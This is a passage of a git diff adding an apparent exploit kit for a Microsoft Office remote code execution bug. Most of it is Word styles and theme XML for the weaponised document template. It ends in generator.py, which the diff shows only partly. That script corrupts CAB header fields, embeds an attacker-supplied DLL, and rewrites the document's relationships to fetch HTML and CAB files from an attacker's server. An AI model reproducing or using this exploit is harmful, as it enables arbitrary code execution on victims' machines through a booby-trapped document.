w:name="Colorful Grid Accent 2" w:uiPriority="73"/><w:lsdException w:name="Light Shading Accent 3" w:uiPriority="60"/><w:lsdException w:name="Light List Accent 3" w:uiPriority="61"/><w:lsdException w:name="Light Grid Accent 3" w:uiPriority="62"/><w:lsdException w:name="Medium Shading 1 Accent 3" w:uiPriority="63"/><w:lsdException w:name="Medium Shading 2 Accent 3" w:uiPriority="64"/><w:lsdException w:name="Medium List 1 Accent 3" w:uiPriority="65"/><w:lsdException w:name="Medium List 2 Accent 3" w:uiPriority="66"/><w:lsdException w:name="Medium Grid 1 Accent 3" w:uiPriority="67"/><w:lsdException w:name="Medium Grid 2 Accent 3" w:uiPriority="68"/><w:lsdException w:name="Medium Grid 3 Accent 3" w:uiPriority="69"/><w:lsdException w:name="Dark List Accent 3" w:uiPriority="70"/><w:lsdException w:name="Colorful Shading Accent 3" w:uiPriority="71"/><w:lsdException w:name="Colorful List Accent 3" w:uiPriority="72"/><w:lsdException w:name="Colorful Grid Accent 3" w:uiPriority="73"/><w:lsdException w:name="Light Shading Accent 4" w:uiPriority="60"/><w:lsdException w:name="Light List Accent 4" w:uiPriority="61"/><w:lsdException w:name="Light Grid Accent 4" w:uiPriority="62"/><w:lsdException w:name="Medium Shading 1 Accent 4" w:uiPriority="63"/><w:lsdException w:name="Medium Shading 2 Accent 4" w:uiPriority="64"/><w:lsdException w:name="Medium List 1 Accent 4" w:uiPriority="65"/><w:lsdException w:name="Medium List 2 Accent 4" w:uiPriority="66"/><w:lsdException w:name="Medium Grid 1 Accent 4" w:uiPriority="67"/><w:lsdException w:name="Medium Grid 2 Accent 4" w:uiPriority="68"/><w:lsdException w:name="Medium Grid 3 Accent 4" w:uiPriority="69"/><w:lsdException w:name="Dark List Accent 4" w:uiPriority="70"/><w:lsdException w:name="Colorful Shading Accent 4" w:uiPriority="71"/><w:lsdException w:name="Colorful List Accent 4" w:uiPriority="72"/><w:lsdException w:name="Colorful Grid Accent 4" w:uiPriority="73"/><w:lsdException w:name="Light Shading Accent 5" w:uiPriority="60"/><w:lsdException w:name="Light List Accent 5" w:uiPriority="61"/><w:lsdException w:name="Light Grid Accent 5" w:uiPriority="62"/><w:lsdException w:name="Medium Shading 1 Accent 5" w:uiPriority="63"/><w:lsdException w:name="Medium Shading 2 Accent 5" w:uiPriority="64"/><w:lsdException w:name="Medium List 1 Accent 5" w:uiPriority="65"/><w:lsdException w:name="Medium List 2 Accent 5" w:uiPriority="66"/><w:lsdException w:name="Medium Grid 1 Accent 5" w:uiPriority="67"/><w:lsdException w:name="Medium Grid 2 Accent 5" w:uiPriority="68"/><w:lsdException w:name="Medium Grid 3 Accent 5" w:uiPriority="69"/><w:lsdException w:name="Dark List Accent 5" w:uiPriority="70"/><w:lsdException w:name="Colorful Shading Accent 5" w:uiPriority="71"/><w:lsdException w:name="Colorful List Accent 5" w:uiPriority="72"/><w:lsdException w:name="Colorful Grid Accent 5" w:uiPriority="73"/><w:lsdException w:name="Light Shading Accent 6" w:uiPriority="60"/><w:lsdException w:name="Light List Accent 6" w:uiPriority="61"/><w:lsdException w:name="Light Grid Accent 6" w:uiPriority="62"/><w:lsdException w:name="Medium Shading 1 Accent 6" w:uiPriority="63"/><w:lsdException w:name="Medium Shading 2 Accent 6" w:uiPriority="64"/><w:lsdException w:name="Medium List 1 Accent 6" w:uiPriority="65"/><w:lsdException w:name="Medium List 2 Accent 6" w:uiPriority="66"/><w:lsdException w:name="Medium Grid 1 Accent 6" w:uiPriority="67"/><w:lsdException w:name="Medium Grid 2 Accent 6" w:uiPriority="68"/><w:lsdException w:name="Medium Grid 3 Accent 6" w:uiPriority="69"/><w:lsdException w:name="Dark List Accent 6" w:uiPriority="70"/><w:lsdException w:name="Colorful Shading Accent 6" w:uiPriority="71"/><w:lsdException w:name="Colorful List Accent 6" w:uiPriority="72"/><w:lsdException w:name="Colorful Grid Accent 6" w:uiPriority="73"/><w:lsdException w:name="Subtle Emphasis" w:uiPriority="19" w:qFormat="1"/><w:lsdException w:name="Intense Emphasis" w:uiPriority="21" w:qFormat="1"/><w:lsdException w:name="Subtle Reference" w:uiPriority="31" w:qFormat="1"/><w:lsdException w:name="Intense Reference" w:uiPriority="32" w:qFormat="1"/><w:lsdException w:name="Book Title" w:uiPriority="33" w:qFormat="1"/><w:lsdException w:name="Bibliography" w:semiHidden="1" w:uiPriority="37" w:unhideWhenUsed="1"/><w:lsdException w:name="TOC Heading" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1" w:qFormat="1"/><w:lsdException w:name="Plain Table 1" w:uiPriority="41"/><w:lsdException w:name="Plain Table 2" w:uiPriority="42"/><w:lsdException w:name="Plain Table 3" w:uiPriority="43"/><w:lsdException w:name="Plain Table 4" w:uiPriority="44"/><w:lsdException w:name="Plain Table 5" w:uiPriority="45"/><w:lsdException w:name="Grid Table Light" w:uiPriority="40"/><w:lsdException w:name="Grid Table 1 Light" w:uiPriority="46"/><w:lsdException w:name="Grid Table 2" w:uiPriority="47"/><w:lsdException w:name="Grid Table 3" w:uiPriority="48"/><w:lsdException w:name="Grid Table 4" w:uiPriority="49"/><w:lsdException w:name="Grid Table 5 Dark" w:uiPriority="50"/><w:lsdException w:name="Grid Table 6 Colorful" w:uiPriority="51"/><w:lsdException w:name="Grid Table 7 Colorful" w:uiPriority="52"/><w:lsdException w:name="Grid Table 1 Light Accent 1" w:uiPriority="46"/><w:lsdException w:name="Grid Table 2 Accent 1" w:uiPriority="47"/><w:lsdException w:name="Grid Table 3 Accent 1" w:uiPriority="48"/><w:lsdException w:name="Grid Table 4 Accent 1" w:uiPriority="49"/><w:lsdException w:name="Grid Table 5 Dark Accent 1" w:uiPriority="50"/><w:lsdException w:name="Grid Table 6 Colorful Accent 1" w:uiPriority="51"/><w:lsdException w:name="Grid Table 7 Colorful Accent 1" w:uiPriority="52"/><w:lsdException w:name="Grid Table 1 Light Accent 2" w:uiPriority="46"/><w:lsdException w:name="Grid Table 2 Accent 2" w:uiPriority="47"/><w:lsdException w:name="Grid Table 3 Accent 2" w:uiPriority="48"/><w:lsdException w:name="Grid Table 4 Accent 2" w:uiPriority="49"/><w:lsdException w:name="Grid Table 5 Dark Accent 2" w:uiPriority="50"/><w:lsdException w:name="Grid Table 6 Colorful Accent 2" w:uiPriority="51"/><w:lsdException w:name="Grid Table 7 Colorful Accent 2" w:uiPriority="52"/><w:lsdException w:name="Grid Table 1 Light Accent 3" w:uiPriority="46"/><w:lsdException w:name="Grid Table 2 Accent 3" w:uiPriority="47"/><w:lsdException w:name="Grid Table 3 Accent 3" w:uiPriority="48"/><w:lsdException w:name="Grid Table 4 Accent 3" w:uiPriority="49"/><w:lsdException w:name="Grid Table 5 Dark Accent 3" w:uiPriority="50"/><w:lsdException w:name="Grid Table 6 Colorful Accent 3" w:uiPriority="51"/><w:lsdException w:name="Grid Table 7 Colorful Accent 3" w:uiPriority="52"/><w:lsdException w:name="Grid Table 1 Light Accent 4" w:uiPriority="46"/><w:lsdException w:name="Grid Table 2 Accent 4" w:uiPriority="47"/><w:lsdException w:name="Grid Table 3 Accent 4" w:uiPriority="48"/><w:lsdException w:name="Grid Table 4 Accent 4" w:uiPriority="49"/><w:lsdException w:name="Grid Table 5 Dark Accent 4" w:uiPriority="50"/><w:lsdException w:name="Grid Table 6 Colorful Accent 4" w:uiPriority="51"/><w:lsdException w:name="Grid Table 7 Colorful Accent 4" w:uiPriority="52"/><w:lsdException w:name="Grid Table 1 Light Accent 5" w:uiPriority="46"/><w:lsdException w:name="Grid Table 2 Accent 5" w:uiPriority="47"/><w:lsdException w:name="Grid Table 3 Accent 5" w:uiPriority="48"/><w:lsdException w:name="Grid Table 4 Accent 5" w:uiPriority="49"/><w:lsdException w:name="Grid Table 5 Dark Accent 5" w:uiPriority="50"/><w:lsdException w:name="Grid Table 6 Colorful Accent 5" w:uiPriority="51"/><w:lsdException w:name="Grid Table 7 Colorful Accent 5" w:uiPriority="52"/><w:lsdException w:name="Grid Table 1 Light Accent 6" w:uiPriority="46"/><w:lsdException w:name="Grid Table 2 Accent 6" w:uiPriority="47"/><w:lsdException w:name="Grid Table 3 Accent 6" w:uiPriority="48"/><w:lsdException w:name="Grid Table 4 Accent 6" w:uiPriority="49"/><w:lsdException w:name="Grid Table 5 Dark Accent 6" w:uiPriority="50"/><w:lsdException w:name="Grid Table 6 Colorful Accent 6" w:uiPriority="51"/><w:lsdException w:name="Grid Table 7 Colorful Accent 6" w:uiPriority="52"/><w:lsdException w:name="List Table 1 Light" w:uiPriority="46"/><w:lsdException w:name="List Table 2" w:uiPriority="47"/><w:lsdException w:name="List Table 3" w:uiPriority="48"/><w:lsdException w:name="List Table 4" w:uiPriority="49"/><w:lsdException w:name="List Table 5 Dark" w:uiPriority="50"/><w:lsdException w:name="List Table 6 Colorful" w:uiPriority="51"/><w:lsdException w:name="List Table 7 Colorful" w:uiPriority="52"/><w:lsdException w:name="List Table 1 Light Accent 1" w:uiPriority="46"/><w:lsdException w:name="List Table 2 Accent 1" w:uiPriority="47"/><w:lsdException w:name="List Table 3 Accent 1" w:uiPriority="48"/><w:lsdException w:name="List Table 4 Accent 1" w:uiPriority="49"/><w:lsdException w:name="List Table 5 Dark Accent 1" w:uiPriority="50"/><w:lsdException w:name="List Table 6 Colorful Accent 1" w:uiPriority="51"/><w:lsdException w:name="List Table 7 Colorful Accent 1" w:uiPriority="52"/><w:lsdException w:name="List Table 1 Light Accent 2" w:uiPriority="46"/><w:lsdException w:name="List Table 2 Accent 2" w:uiPriority="47"/><w:lsdException w:name="List Table 3 Accent 2" w:uiPriority="48"/><w:lsdException w:name="List Table 4 Accent 2" w:uiPriority="49"/><w:lsdException w:name="List Table 5 Dark Accent 2" w:uiPriority="50"/><w:lsdException w:name="List Table 6 Colorful Accent 2" w:uiPriority="51"/><w:lsdException w:name="List Table 7 Colorful Accent 2" w:uiPriority="52"/><w:lsdException w:name="List Table 1 Light Accent 3" w:uiPriority="46"/><w:lsdException w:name="List Table 2 Accent 3" w:uiPriority="47"/><w:lsdException w:name="List Table 3 Accent 3" w:uiPriority="48"/><w:lsdException w:name="List Table 4 Accent 3" w:uiPriority="49"/><w:lsdException w:name="List Table 5 Dark Accent 3" w:uiPriority="50"/><w:lsdException w:name="List Table 6 Colorful Accent 3" w:uiPriority="51"/><w:lsdException w:name="List Table 7 Colorful Accent 3" w:uiPriority="52"/><w:lsdException w:name="List Table 1 Light Accent 4" w:uiPriority="46"/><w:lsdException w:name="List Table 2 Accent 4" w:uiPriority="47"/><w:lsdException w:name="List Table 3 Accent 4" w:uiPriority="48"/><w:lsdException w:name="List Table 4 Accent 4" w:uiPriority="49"/><w:lsdException w:name="List Table 5 Dark Accent 4" w:uiPriority="50"/><w:lsdException w:name="List Table 6 Colorful Accent 4" w:uiPriority="51"/><w:lsdException w:name="List Table 7 Colorful Accent 4" w:uiPriority="52"/><w:lsdException w:name="List Table 1 Light Accent 5" w:uiPriority="46"/><w:lsdException w:name="List Table 2 Accent 5" w:uiPriority="47"/><w:lsdException w:name="List Table 3 Accent 5" w:uiPriority="48"/><w:lsdException w:name="List Table 4 Accent 5" w:uiPriority="49"/><w:lsdException w:name="List Table 5 Dark Accent 5" w:uiPriority="50"/><w:lsdException w:name="List Table 6 Colorful Accent 5" w:uiPriority="51"/><w:lsdException w:name="List Table 7 Colorful Accent 5" w:uiPriority="52"/><w:lsdException w:name="List Table 1 Light Accent 6" w:uiPriority="46"/><w:lsdException w:name="List Table 2 Accent 6" w:uiPriority="47"/><w:lsdException w:name="List Table 3 Accent 6" w:uiPriority="48"/><w:lsdException w:name="List Table 4 Accent 6" w:uiPriority="49"/><w:lsdException w:name="List Table 5 Dark Accent 6" w:uiPriority="50"/><w:lsdException w:name="List Table 6 Colorful Accent 6" w:uiPriority="51"/><w:lsdException w:name="List Table 7 Colorful Accent 6" w:uiPriority="52"/><w:lsdException w:name="Mention" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Smart Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Hashtag" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Unresolved Mention" w:semiHidden="1" w:unhideWhenUsed="1"/></w:latentStyles><w:style w:type="paragraph" w:default="1" w:styleId="Normal"><w:name w:val="Normal"/><w:qFormat/><w:rsid w:val="00D87583"/><w:pPr><w:spacing w:line="260" w:lineRule="atLeast"/></w:pPr><w:rPr><w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Times New Roman" w:hAnsi="Trebuchet MS" w:cs="Times New Roman"/><w:lang w:val="en-GB"/></w:rPr></w:style><w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont"><w:name w:val="Default Paragraph Font"/><w:uiPriority w:val="1"/><w:semiHidden/><w:unhideWhenUsed/></w:style><w:style w:type="table" w:default="1" w:styleId="TableNormal"><w:name w:val="Normal Table"/><w:uiPriority w:val="99"/><w:semiHidden/><w:unhideWhenUsed/><w:tblPr><w:tblInd w:w="0" w:type="dxa"/><w:tblCellMar><w:top w:w="0" w:type="dxa"/><w:left w:w="108" w:type="dxa"/><w:bottom w:w="0" w:type="dxa"/><w:right w:w="108" w:type="dxa"/></w:tblCellMar></w:tblPr></w:style><w:style w:type="numbering" w:default="1" w:styleId="NoList"><w:name w:val="No List"/><w:uiPriority w:val="99"/><w:semiHidden/><w:unhideWhenUsed/></w:style><w:style w:type="character" w:customStyle="1" w:styleId="BodyTextChar"><w:name w:val="Body Text Char"/><w:basedOn w:val="DefaultParagraphFont"/><w:link w:val="BodyText"/><w:qFormat/><w:rsid w:val="00D87583"/><w:rPr><w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Times New Roman" w:hAnsi="Trebuchet MS" w:cs="Times New Roman"/><w:lang w:val="en-GB"/></w:rPr></w:style><w:style w:type="character" w:customStyle="1" w:styleId="Bullets"><w:name w:val="Bullets"/><w:qFormat/><w:rPr><w:rFonts w:ascii="OpenSymbol" w:eastAsia="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol"/></w:rPr></w:style><w:style w:type="character" w:styleId="Hyperlink"><w:name w:val="Hyperlink"/><w:rPr><w:color w:val="000080"/><w:u w:val="single"/><w:lang/></w:rPr></w:style><w:style w:type="paragraph" w:customStyle="1" w:styleId="Heading"><w:name w:val="Heading"/><w:basedOn w:val="Normal"/><w:next w:val="BodyText"/><w:qFormat/><w:pPr><w:keepNext/><w:spacing w:before="240" w:after="120"/></w:pPr><w:rPr><w:rFonts w:ascii="Liberation Sans" w:eastAsia="Droid Sans Fallback" w:hAnsi="Liberation Sans" w:cs="Droid Sans Devanagari"/><w:sz w:val="28"/><w:szCs w:val="28"/></w:rPr></w:style><w:style w:type="paragraph" w:styleId="BodyText"><w:name w:val="Body Text"/><w:basedOn w:val="Normal"/><w:link w:val="BodyTextChar"/><w:rsid w:val="00D87583"/><w:pPr><w:spacing w:after="260"/></w:pPr></w:style><w:style w:type="paragraph" w:styleId="List"><w:name w:val="List"/><w:basedOn w:val="BodyText"/><w:rPr><w:rFonts w:cs="Droid Sans Devanagari"/></w:rPr></w:style><w:style w:type="paragraph" w:styleId="Caption"><w:name w:val="caption"/><w:basedOn w:val="Normal"/><w:qFormat/><w:pPr><w:suppressLineNumbers/><w:spacing w:before="120" w:after="120"/></w:pPr><w:rPr><w:rFonts w:cs="Droid Sans Devanagari"/><w:i/><w:iCs/><w:sz w:val="24"/><w:szCs w:val="24"/></w:rPr></w:style><w:style w:type="paragraph" w:customStyle="1" w:styleId="Index"><w:name w:val="Index"/><w:basedOn w:val="Normal"/><w:qFormat/><w:pPr><w:suppressLineNumbers/></w:pPr><w:rPr><w:rFonts w:cs="Droid Sans Devanagari"/></w:rPr></w:style><w:style w:type="paragraph" w:customStyle="1" w:styleId="TableContents"><w:name w:val="Table Contents"/><w:basedOn w:val="Normal"/><w:qFormat/><w:pPr><w:widowControl w:val="0"/><w:suppressLineNumbers/></w:pPr></w:style><w:style w:type="paragraph" w:customStyle="1" w:styleId="TableHeading"><w:name w:val="Table Heading"/><w:basedOn w:val="TableContents"/><w:qFormat/><w:pPr><w:jc w:val="center"/></w:pPr><w:rPr><w:b/><w:bCs/></w:rPr></w:style><w:style w:type="paragraph" w:customStyle="1" w:styleId="HeaderandFooter"><w:name w:val="Header and Footer"/><w:basedOn w:val="Normal"/><w:qFormat/><w:pPr><w:suppressLineNumbers/><w:tabs><w:tab w:val="center" w:pos="4535"/><w:tab w:val="right" w:pos="9070"/></w:tabs></w:pPr></w:style><w:style w:type="paragraph" w:styleId="Header"><w:name w:val="header"/><w:basedOn w:val="HeaderandFooter"/></w:style></w:styles>
\ No newline at end of file
diff --git a/data/word_dat/word/theme/theme1.xml b/data/word_dat/word/theme/theme1.xml
new file mode 100644
index 0000000..9616693
--- /dev/null
+++ b/data/word_dat/word/theme/theme1.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office Theme"><a:themeElements><a:clrScheme name="Office"><a:dk1><a:sysClr val="windowText" lastClr="000000"/></a:dk1><a:lt1><a:sysClr val="window" lastClr="FFFFFF"/></a:lt1><a:dk2><a:srgbClr val="1F497D"/></a:dk2><a:lt2><a:srgbClr val="EEECE1"/></a:lt2><a:accent1><a:srgbClr val="4F81BD"/></a:accent1><a:accent2><a:srgbClr val="C0504D"/></a:accent2><a:accent3><a:srgbClr val="9BBB59"/></a:accent3><a:accent4><a:srgbClr val="8064A2"/></a:accent4><a:accent5><a:srgbClr val="4BACC6"/></a:accent5><a:accent6><a:srgbClr val="F79646"/></a:accent6><a:hlink><a:srgbClr val="0000FF"/></a:hlink><a:folHlink><a:srgbClr val="800080"/></a:folHlink></a:clrScheme><a:fontScheme name="Office"><a:majorFont><a:latin typeface="Cambria"/><a:ea typeface=""/><a:cs typeface=""/><a:font script="Jpan" typeface="ＭＳ ゴシック"/><a:font script="Hang" typeface="맑은 고딕"/><a:font script="Hans" typeface="宋体"/><a:font script="Hant" typeface="新細明體"/><a:font script="Arab" typeface="Times New Roman"/><a:font script="Hebr" typeface="Times New Roman"/><a:font script="Thai" typeface="Angsana New"/><a:font script="Ethi" typeface="Nyala"/><a:font script="Beng" typeface="Vrinda"/><a:font script="Gujr" typeface="Shruti"/><a:font script="Khmr" typeface="MoolBoran"/><a:font script="Knda" typeface="Tunga"/><a:font script="Guru" typeface="Raavi"/><a:font script="Cans" typeface="Euphemia"/><a:font script="Cher" typeface="Plantagenet Cherokee"/><a:font script="Yiii" typeface="Microsoft Yi Baiti"/><a:font script="Tibt" typeface="Microsoft Himalaya"/><a:font script="Thaa" typeface="MV Boli"/><a:font script="Deva" typeface="Mangal"/><a:font script="Telu" typeface="Gautami"/><a:font script="Taml" typeface="Latha"/><a:font script="Syrc" typeface="Estrangelo Edessa"/><a:font script="Orya" typeface="Kalinga"/><a:font script="Mlym" typeface="Kartika"/><a:font script="Laoo" typeface="DokChampa"/><a:font script="Sinh" typeface="Iskoola Pota"/><a:font script="Mong" typeface="Mongolian Baiti"/><a:font script="Viet" typeface="Times New Roman"/><a:font script="Uigh" typeface="Microsoft Uighur"/><a:font script="Geor" typeface="Sylfaen"/></a:majorFont><a:minorFont><a:latin typeface="Calibri"/><a:ea typeface=""/><a:cs typeface=""/><a:font script="Jpan" typeface="ＭＳ 明朝"/><a:font script="Hang" typeface="맑은 고딕"/><a:font script="Hans" typeface="宋体"/><a:font script="Hant" typeface="新細明體"/><a:font script="Arab" typeface="Arial"/><a:font script="Hebr" typeface="Arial"/><a:font script="Thai" typeface="Cordia New"/><a:font script="Ethi" typeface="Nyala"/><a:font script="Beng" typeface="Vrinda"/><a:font script="Gujr" typeface="Shruti"/><a:font script="Khmr" typeface="DaunPenh"/><a:font script="Knda" typeface="Tunga"/><a:font script="Guru" typeface="Raavi"/><a:font script="Cans" typeface="Euphemia"/><a:font script="Cher" typeface="Plantagenet Cherokee"/><a:font script="Yiii" typeface="Microsoft Yi Baiti"/><a:font script="Tibt" typeface="Microsoft Himalaya"/><a:font script="Thaa" typeface="MV Boli"/><a:font script="Deva" typeface="Mangal"/><a:font script="Telu" typeface="Gautami"/><a:font script="Taml" typeface="Latha"/><a:font script="Syrc" typeface="Estrangelo Edessa"/><a:font script="Orya" typeface="Kalinga"/><a:font script="Mlym" typeface="Kartika"/><a:font script="Laoo" typeface="DokChampa"/><a:font script="Sinh" typeface="Iskoola Pota"/><a:font script="Mong" typeface="Mongolian Baiti"/><a:font script="Viet" typeface="Arial"/><a:font script="Uigh" typeface="Microsoft Uighur"/><a:font script="Geor" typeface="Sylfaen"/></a:minorFont></a:fontScheme><a:fmtScheme name="Office"><a:fillStyleLst><a:solidFill><a:schemeClr val="phClr"/></a:solidFill><a:gradFill rotWithShape="1"><a:gsLst><a:gs pos="0"><a:schemeClr val="phClr"><a:tint val="50000"/><a:satMod val="300000"/></a:schemeClr></a:gs><a:gs pos="35000"><a:schemeClr val="phClr"><a:tint val="37000"/><a:satMod val="300000"/></a:schemeClr></a:gs><a:gs pos="100000"><a:schemeClr val="phClr"><a:tint val="15000"/><a:satMod val="350000"/></a:schemeClr></a:gs></a:gsLst><a:lin ang="16200000" scaled="1"/></a:gradFill><a:gradFill rotWithShape="1"><a:gsLst><a:gs pos="0"><a:schemeClr val="phClr"><a:shade val="51000"/><a:satMod val="130000"/></a:schemeClr></a:gs><a:gs pos="80000"><a:schemeClr val="phClr"><a:shade val="93000"/><a:satMod val="130000"/></a:schemeClr></a:gs><a:gs pos="100000"><a:schemeClr val="phClr"><a:shade val="94000"/><a:satMod val="135000"/></a:schemeClr></a:gs></a:gsLst><a:lin ang="16200000" scaled="0"/></a:gradFill></a:fillStyleLst><a:lnStyleLst><a:ln w="9525" cap="flat" cmpd="sng" algn="ctr"><a:solidFill><a:schemeClr val="phClr"><a:shade val="95000"/><a:satMod val="105000"/></a:schemeClr></a:solidFill><a:prstDash val="solid"/></a:ln><a:ln w="25400" cap="flat" cmpd="sng" algn="ctr"><a:solidFill><a:schemeClr val="phClr"/></a:solidFill><a:prstDash val="solid"/></a:ln><a:ln w="38100" cap="flat" cmpd="sng" algn="ctr"><a:solidFill><a:schemeClr val="phClr"/></a:solidFill><a:prstDash val="solid"/></a:ln></a:lnStyleLst><a:effectStyleLst><a:effectStyle><a:effectLst><a:outerShdw blurRad="40000" dist="20000" dir="5400000" rotWithShape="0"><a:srgbClr val="000000"><a:alpha val="38000"/></a:srgbClr></a:outerShdw></a:effectLst></a:effectStyle><a:effectStyle><a:effectLst><a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0"><a:srgbClr val="000000"><a:alpha val="35000"/></a:srgbClr></a:outerShdw></a:effectLst></a:effectStyle><a:effectStyle><a:effectLst><a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0"><a:srgbClr val="000000"><a:alpha val="35000"/></a:srgbClr></a:outerShdw></a:effectLst><a:scene3d><a:camera prst="orthographicFront"><a:rot lat="0" lon="0" rev="0"/></a:camera><a:lightRig rig="threePt" dir="t"><a:rot lat="0" lon="0" rev="1200000"/></a:lightRig></a:scene3d><a:sp3d><a:bevelT w="63500" h="25400"/></a:sp3d></a:effectStyle></a:effectStyleLst><a:bgFillStyleLst><a:solidFill><a:schemeClr val="phClr"/></a:solidFill><a:gradFill rotWithShape="1"><a:gsLst><a:gs pos="0"><a:schemeClr val="phClr"><a:tint val="40000"/><a:satMod val="350000"/></a:schemeClr></a:gs><a:gs pos="40000"><a:schemeClr val="phClr"><a:tint val="45000"/><a:shade val="99000"/><a:satMod val="350000"/></a:schemeClr></a:gs><a:gs pos="100000"><a:schemeClr val="phClr"><a:shade val="20000"/><a:satMod val="255000"/></a:schemeClr></a:gs></a:gsLst><a:path path="circle"><a:fillToRect l="50000" t="-80000" r="50000" b="180000"/></a:path></a:gradFill><a:gradFill rotWithShape="1"><a:gsLst><a:gs pos="0"><a:schemeClr val="phClr"><a:tint val="80000"/><a:satMod val="300000"/></a:schemeClr></a:gs><a:gs pos="100000"><a:schemeClr val="phClr"><a:shade val="30000"/><a:satMod val="200000"/></a:schemeClr></a:gs></a:gsLst><a:path path="circle"><a:fillToRect l="50000" t="50000" r="50000" b="50000"/></a:path></a:gradFill></a:bgFillStyleLst></a:fmtScheme></a:themeElements><a:objectDefaults/><a:extraClrSchemeLst/></a:theme>
\ No newline at end of file
diff --git a/data/word_dat/word/webSettings.xml b/data/word_dat/word/webSettings.xml
new file mode 100644
index 0000000..2062e93
--- /dev/null
+++ b/data/word_dat/word/webSettings.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:webSettings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid"/>
\ No newline at end of file
diff --git a/generator.py b/generator.py
new file mode 100644
index 0000000..0b76ddd
--- /dev/null
+++ b/generator.py
@@ -0,0 +1,222 @@
+#!/usr/bin/env python3
+
+# Microsoft Office Remote Code Execution Exploit via Logical Bug
+# Result is ability for attackers to execute arbitrary custom DLL's
+# downloaded and executed on target system
+import argparse
+import binascii
+import random
+import re
+import shutil
+import string
+import struct
+import sys
+import os
+import subprocess
+import traceback
+from pathlib import Path
+from cab_parser import Cab
+from in_place import InPlace
+
+
+def patch_cab(path: Path, original_inf_path, patched_inf_path):
+    with InPlace(str(path.absolute()), mode="b") as out_cab:
+        cab = Cab(out_cab.read())
+        print("  [*] Setting setID to 1234")
+        cab.change_set_id(1234)
+        print("  [*] Setting CFFolder.coffCabStart to 80")
+        cab.change_coff_cab_start(80)
+        print("  [*] Setting CFFolder.CCFData to 2")
+        cab.change_ccfdata_count(2)
+        size = struct.unpack("<I", b"\x00\x22\x44\x00")[0]
+        print(f"  [*] Setting CFFile.CbFile to {size}")
+        cab.change_cffile_cbfile(size)
+        print("  [*] Making INF file read only")
+        cab.make_file_read_only()
+        print("  [*] Zeroing out Checksum")
+        cab.zero_out_signature()
+        out_cab.write(cab.to_bytes())
+
+    with InPlace(str(path.absolute()), mode="b") as out_cab:
+        content = out_cab.read()
+        content = content.replace(original_inf_path, patched_inf_path)
+        print(f"  [*] Patching path '{original_inf_path.decode()}' to '{patched_inf_path.decode()}'")
+        out_cab.write(content)
+
+
+def make_ddf(ddf_file: Path, cab_file: Path, inf_file: Path):
+    # We need to generate a DDF file for makecab to work properly
+    # CabinetNameTemplate = Basename of the cab file
+    # DiskDirectoryTemplate = Directory where the cab file will be
+    with open(str(ddf_file.absolute()), "w") as ddf:
+        ddf.write(rf""".OPTION EXPLICIT
+.Set CabinetNameTemplate={cab_file.name}       
+.set DiskDirectoryTemplate={cab_file.parent.name}
+.Set CompressionType=MSZIP
+.Set UniqueFiles=OFF
+.Set Cabinet=ON
+.Set Compress=OFF
+.Set CabinetFileCountThreshold=0
+.Set FolderFileCountThreshold=0
+.Set FolderSizeThreshold=0
+.Set MaxCabinetSize=0
+.Set MaxDiskFileCount=0
+.Set MaxDiskSize=0
+{inf_file.absolute()}""")
+
+
+def execute_cmd(cmd, execute_from=None):
+    try:
+        subprocess.check_output(
+            cmd,
+            shell=True,
+            cwd=execute_from
+        )
+    except subprocess.CalledProcessError as calledProcessError:
+        print(calledProcessError)
+        exit(1)
+
+
+def generate_payload(payload, server_url, basename, copy_to=None):
+    # Current Working Directory
+    working_directory = Path(__file__).parent
+
+    # Relevant directories for Execution
+    data_path = working_directory.joinpath("data")
+    word_dat_path = data_path.joinpath("word_dat")
+    srv_path = working_directory.joinpath("srv")
+    out_path = working_directory.joinpath("out")
+    cab_path = working_directory.joinpath("cab")
+    template_path = working_directory.joinpath("template")
+
+    # Relevant files
+    tmp_path = data_path.joinpath("tmp_doc")
+    word_dll = data_path.joinpath(f'{basename}.dll')
+    word_doc = out_path.joinpath('document.docx')
+    ddf = data_path.joinpath('mswordcab.ddf')
+    cab_file = out_path.joinpath(f"{basename}.cab")
+    inf_file = cab_path.joinpath(f"{basename}.inf")
+    html_template_file = template_path.joinpath("sample3.html")
+    html_final_file = srv_path.joinpath(f"{basename}.html")
+
+    # Checking ephemeral directories
+    tmp_path.mkdir(exist_ok=True)
+    cab_path.mkdir(exist_ok=True)
+
+    print(f'  [>] Payload: {payload}')
+    print(f'  [>] HTML/CAB Hosting Server: {server_url}')
+
+    try:
+        payload_content = open(payload, 'rb').read()
+        with open(str(word_dll), 'wb') as filep:
+            filep.write(payload_content)
+    except FileNotFoundError:
+        print('[-] DLL Payload specified not found!')
+        exit(1)
+    except Exception as e:
+        print(f"[-] Exception: {e}")
+        exit(1)
+
+    shutil.copytree(str(word_dat_path), str(tmp_path), dirs_exist_ok=True)
+    print('[*] Crafting Relationships to point to HTML/CAB Hosting Server...')
+    with InPlace(str(tmp_path.joinpath("word").joinpath("_rels").joinpath('document.xml.rels'))) as rels:
+        xml_content = rels.read()
+        xml_content = xml_content.replace('<EXPLOIT_HOST_HERE>', f'{server_url}/{html_final_file.name}')
+        xml_content = xml_content.replace('<INF_CHANGE_HERE>', inf_file.name)
+        rels.write(xml_content)
+
+    print('[*] Packing MS Word .docx file...')
+    word_doc.unlink(missing_ok=True)
